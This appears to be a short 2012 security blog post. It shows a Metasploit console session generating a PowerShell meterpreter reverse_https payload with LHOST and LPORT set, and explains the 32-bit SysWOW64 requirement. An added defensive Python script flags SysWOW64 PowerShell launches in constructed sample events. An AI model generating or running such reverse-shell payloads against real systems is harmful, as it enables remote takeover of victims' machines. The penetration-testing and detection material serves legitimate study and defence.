Monday, October 8, 2012

Metasploit and PowerShell payloads

Quick post, since I mentioned it in the DerbyCon talk: Metasploit can generate PowerShell and PowerShell .NET payloads (the latter looks related to this).
msf > use payload/windows/meterpreter/reverse_https
msf  payload(reverse_https) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf  payload(reverse_https) > set LPORT 443
LPORT => 443
msf  payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf  payload(reverse_https) > 

The generator is based on old PowerSploit code (here). Also, the 64-bit business I mentioned here still applies: windows/meterpreter/reverse_https is a 32-bit payload, so on x64 you need to call the PowerShell in SysWOW64 to run 32-bit payloads.
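Since the 32-bit payload only runs under the SysWOW64 PowerShell on an x64 host, that launch path is a useful thing to watch for. The script below is an added example (not code from the original post or from Metasploit) that scans process-creation records for powershell.exe started from the SysWOW64 directory; the event lines and their key=value format are constructed for this example and only loosely resemble Windows 4688 or Sysmon records.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample events (not real telemetry) in a simplified
# key=value form resembling Windows 4688 / Sysmon process-creation records.
SAMPLE_EVENTS = [
    r'ts=2012-10-08T10:00:01 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" parent="C:\Windows\explorer.exe"',
    r'ts=2012-10-08T10:00:05 image="C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" parent="C:\Windows\explorer.exe"',
    r'ts=2012-10-08T10:00:09 image="C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" parent="C:\Users\cg\Downloads\setup.exe"',
    r'ts=2012-10-08T10:00:12 image="C:\Windows\SysWOW64\notepad.exe" parent="C:\Windows\explorer.exe"',
    "not an event line",
]

# One record: timestamp, image path of the new process, image path of its parent.
EVENT_RE = re.compile(r'ts=(\S+) image="([^"]+)" parent="([^"]+)"')

# The 32-bit PowerShell host lives under SysWOW64 only on x64 Windows; the
# 64-bit host under System32 is the normal case there.
WOW64_PS_RE = re.compile(
    r"\\syswow64\\windowspowershell\\v[\d.]+\\powershell\.exe$", re.IGNORECASE
)


@dataclass
class Finding:
    ts: str
    image: str
    parent: str


def parse_event(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (ts, image, parent) for a well-formed line, else None."""
    m = EVENT_RE.match(line)
    return m.groups() if m else None


def find_wow64_powershell(lines: List[str]) -> List[Finding]:
    """Return every event where the new process is the SysWOW64 PowerShell."""
    findings = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue  # malformed or unrelated line
        ts, image, parent = parsed
        if WOW64_PS_RE.search(image):
            findings.append(Finding(ts, image, parent))
    return findings


def parents_of(findings: List[Finding]) -> List[str]:
    """Parent image file names, for a quick look at what spawned the 32-bit host."""
    return [f.parent.rsplit("\\", 1)[-1] for f in findings]


if __name__ == "__main__":
    for f in find_wow64_powershell(SAMPLE_EVENTS):
        print(f"{f.ts}  {f.image}  <- {f.parent}")
```

In the constructed sample, the System32 launch and the SysWOW64 notepad.exe launch are ignored, and the two SysWOW64 PowerShell launches are reported with their parents; a real deployment would feed this from the host's process-creation telemetry and then decide, per environment, which parents legitimately start the 32-bit host.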

[Image: PowerShell version]

[Image: PowerShell .NET version]

CG